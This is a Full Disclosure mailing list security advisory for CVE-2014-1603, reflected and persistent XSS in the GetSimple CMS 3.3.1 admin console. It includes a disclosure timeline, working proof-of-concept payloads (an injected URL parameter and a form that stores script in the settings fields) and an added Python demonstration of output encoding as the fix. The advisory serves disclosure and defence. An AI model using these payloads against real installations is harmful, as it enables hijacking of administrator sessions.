
[FD] [CVE-2014-1603] XSS in GetSimple CMS 3.3.1



Hi,

Found some persistent and reflected cross site scripting in the Admin
console of GetSimple CMS 3.3.1 and below.
Waited 6 months for a fix but the developer stopped answering my
emails, so decided to release this anyway.

Details attached if you care - also available at
https://raw.githubusercontent.com/pedrib/PoC/master/getsimplecms-3.3.1.txt.

Regards,
Pedro Ribeiro
Agile Information Security
PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@xxxxxxxxx) from Agile Information Security

Timeline:
        04/11/2013 - Found bugs, produced proof of concept.
        05/11/2013 - Communicated to the developer, who acknowledged receipt.
        10/01/2014 - Politely asked the developer for progress, no response.
        17/01/2014 - Received CVE number from MITRE.
        20/01/2014 - Communicated CVE number to the developer, no response.
        29/01/2014 - Politely asked the developer for progress, no response.
        12/05/2014 - Public release.
==============================

Reflected XSS in plugin load page:

        http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data&param="><script>alert(1)</script>

Persistent XSS in settings page:

        <form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
        <input type="text" name="user" value="&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;">
        <input type="text" name="email" value="&quot;&gt;&lt;script&gt;alert(2);&lt;/script&gt;">
        <input type="text" name="name" value="&quot;&gt;&lt;script&gt;alert(3);&lt;/script&gt;">
        <input type="hidden" name="submitted" value="Save Settings">
        <input type="submit" value="Submit">
        </form>

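Added illustration, not part of the advisory and not GetSimple's own code (which is PHP; the rendering function below is a Python stand-in for the settings page). It shows why the stored user/email/name values from the PoC above come back to the browser as live script, and how HTML-attribute encoding of the echoed values, the fix the vendor would need for both the settings fields and the reflected param value, stops it:

```python
# Added example (not from the advisory or from GetSimple CMS): the settings
# page stores user/email/name and echoes them back into <input value="...">.
# Echoing a stored value into an attribute without attribute-context encoding
# is what lets the PoC payloads break out of the attribute and inject a tag.
import html
from html.parser import HTMLParser

# The three payloads from the persistent-XSS PoC, entity-decoded as the
# browser would submit them from the form above (constructed test input).
POC_SETTINGS = {
    "user": '"><script>alert(1);</script>',
    "email": '"><script>alert(2);</script>',
    "name": '"><script>alert(3);</script>',
}

def render_settings_form(settings, encode):
    """Render the settings form; encode=True is the corrected behaviour."""
    rows = []
    for field, value in settings.items():
        if encode:
            # ENT_QUOTES-style escaping: quotes, <, > and & all become
            # entities, so a value can neither close the attribute nor open a tag.
            value = html.escape(value, quote=True)
        rows.append(f'<input type="text" name="{field}" value="{value}">')
    return "<form>\n" + "\n".join(rows) + "\n</form>"

class _ScriptTagFinder(HTMLParser):
    """Counts <script> elements that the HTML parser actually sees."""
    def __init__(self):
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1

def injected_script_count(markup):
    """Number of <script> tags that end up as real elements in the markup."""
    finder = _ScriptTagFinder()
    finder.feed(markup)
    return finder.script_tags

if __name__ == "__main__":
    # Unencoded: every stored value becomes a script element (3).
    print(injected_script_count(render_settings_form(POC_SETTINGS, encode=False)))
    # Encoded: the payloads stay inert text inside the attribute (0).
    print(injected_script_count(render_settings_form(POC_SETTINGS, encode=True)))
```
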
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/